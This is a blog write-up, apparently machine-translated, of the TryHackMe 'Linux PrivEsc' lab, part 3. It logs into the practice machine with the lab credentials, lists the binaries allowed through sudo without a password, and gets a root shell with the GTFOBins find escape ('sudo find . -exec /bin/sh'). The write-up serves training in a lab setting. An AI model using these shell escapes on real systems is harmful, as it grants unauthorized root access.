![[TryHackMe] Improvement of privilege using GTFOBins! Linux PrivEsc Writepu Part 3](https://hack-lab-256.com/wp-content/uploads/2023/03/hack-lab-256-samnail-9.jpg)
This time, we will try escalating privileges using "GTFOBins."
The target machine uses the Room below of TryHackMe.
"TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc "
This article is part 3.
If you would like to check Writeup for Linux PrivEsc with TryHackMe, please also check Elevation of Privileges with Vulnerable File Permissions in Linux
Pochip
Pochip
Pochip
Pochip
Preparation
Starting the target machine
First, start the target machine.
Join "TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc
If IP Address is displayed like this, booting is OK.
SSH connection
Connect to the target machine you started using SSH.
As explained, it's OK as long as you can connect using "user:password321".
└─$ ssh user@10.10.6.35 The authenticity of host '10.10.6.35 (10.10.6.35)' can't be established. DSA key fingerprint is SHA256:p2NSsfvYJVk1Qe0tsNX5G2h8AaWYRn71jdz3uEodbMA. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.6.35' (DSA) to the list of known hosts. user@10.10.6.35's password: Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri May 15 06:41:23 2020 from 192.168.1.125 user@debian:~$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATHYou may need to add "-oHostKeyAlgorithms=+ssh-rsa".
Elevation of Privilege using GTFOBins
Now, I would like to try escalating privileges using GTFOBins.
How many programs is “user” allowed to run via sudo? (How many programs are there any programs that "user" can run via sudo?)
First, I would like to get a program that users can run in sodo.
The command is "sodo -l".
user@debian:~$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH User user may run the following commands on this host: (root) NOPASSWD: /usr/sbin/iftop (root) NOPASSWD: /usr/bin/find (root) NOPASSWD: /usr/bin/nano (root) NOPASSWD: /usr/bin/vim (root) NOPASSWD: /usr/bin/man (root) NOPASSWD: /usr/bin/awk (root) NOPASSWD: /usr/bin/less (root) NOPASSWD: /usr/bin/ftp (root) NOPASSWD: /usr/bin/nmap (root) NOPASSWD: /usr/sbin/apache2 (root) NOPASSWD: /bin/moreI found that the above 11 programs can be run in sodo.
One program on the list doesn't have a shell escape sequence on GTFOBins. Which is it?
Next, look for programs that do not have a Shell escape sequence.
(I guess it's like searching for a program with a Shell escape sequence.)
When I looked for each one, I found that there was no "apache2".
The answer is "apache2".
Try elevating privileges using GTFOBins
Now let's try to actually escalate privileges.
It should be possible if the items listed above are other than "apache2". This time I'll try it with find.
First, search on find and take a look at Sodo.
It seems like it's just a matter of running the command, so I'll try running it to implement it.
user@debian:~$ sudo find . -exec /bin/sh \; -quit sh-4.1# whoami rootI have confirmed that I have actually been elevated to root.
It's really easy. . . Is it okay to be this simple? . .
summary
This time, we tried escalating privileges using "GTFOBins."
It was a bit disappointing because it was very easy to escalate privileges, but it seems like it could be used.
References and Sites
Medium ( Shamsher khan ): https://infosecwriteups.com/linux-privesc-tryhackme-writeup-bf4e32460ee5
![[HackTheBox] What to do if "An error of type HTTPClient::ReceiveTimeoutError happened, message is executed expired" appears in Evil-WinRM](https://hack-lab-256.com/wp-content/uploads/2023/09/hack-lab-256-samnail-4-300x169.jpg)
![[CVE-2015-3306] I enumerated the shared Samba, manipulate a vulnerable version of proftpd, and escalated privileges by manipulating path variables! TryHackMe Kenobi Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-2-300x169.jpg)
![[Permanent CTF for beginners] setodaNote CTF WEB Writeup! Recommended for getting a sense of CTF!](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-1-1-300x169.jpg)
![[TryHackMe] We conducted packet analysis using wireshark to investigate the intrusion of ssh-backdoor! Overpass2 Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-300x169.jpg)
![[CVE-2018-16763] fuel CMS 1.4.1 - I converted Remote Code Execution (1) to python 3 and hacked it! TryHackMe Ignite Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-25-300x169.jpg)
![[TryHackMe] I used SSH2John to extract the hash from the private key and hacked the password with John the Ripper! Overpass Writeup](https://hack-lab-256.com/wp-content/uploads/2023/07/hack-lab-256-samnail-24-300x169.jpg)
![[TryHackMe] I tried infiltrating a Windows machine with a ret2esp attack (Buffer Overflow)! Brainstorm Writeup](https://hack-lab-256.com/wp-content/uploads/2023/06/hack-lab-256-samnail-23-300x169.jpg)